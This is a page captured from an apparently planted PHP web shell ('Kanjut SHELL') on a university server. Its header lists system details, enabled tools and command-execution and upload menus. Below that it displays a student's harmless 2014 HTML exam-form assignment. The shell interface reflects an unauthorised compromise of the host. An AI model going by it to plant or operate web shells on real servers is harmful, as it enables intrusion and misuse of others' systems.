Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.147.73.85
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jdwhitehurst/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jdwhitehurst/www/assignment2b.html
<!--
        Assignment2b.html
	Jeremy Whitehurst
	Due: Feb. 10, 2014
	Goal: Create an exam form with 4 questions that displays the percentage of correct
		answers and which ones were wrong.
        
-->

<CENTER>
<H2>
Exam Form
</H2>
<HR>
<FORM action=assignment2b.php method=post>

1. The major most students choose was?
<INPUT type=radio name=q1 value=A>Chemistry
<INPUT type=radio name=q1 value=B>Math
<INPUT type=radio name=q1 value=C>Business
<INPUT type=radio name=q1 value=D>Biology
<p>
2. The bookstore sells _.
<INPUT type=radio name=q2 value=A>Shoes
<INPUT type=radio name=q2 value=B>Books
<INPUT type=radio name=q2 value=C>Groceries
<INPUT type=radio name=q2 value=D>Lamps
<p>
3. The monkeys jumped off the _.
<INPUT type=radio name=q3 value=A>Building
<INPUT type=radio name=q3 value=B>School
<INPUT type=radio name=q3 value=C>Bed
<INPUT type=radio name=q3 value=D>Car
<p>
4. The United States is on which continent?
<INPUT type=radio name=q4 value=A>Africa
<INPUT type=radio name=q4 value=B>Europe
<INPUT type=radio name=q4 value=C>Asia
<INPUT type=radio name=q4 value=D>North America

<p>
<INPUT type=submit value=Submit>
<INPUT type=reset value=Reset>
</FORM>

</CENTER>


Stv3n404 - 2023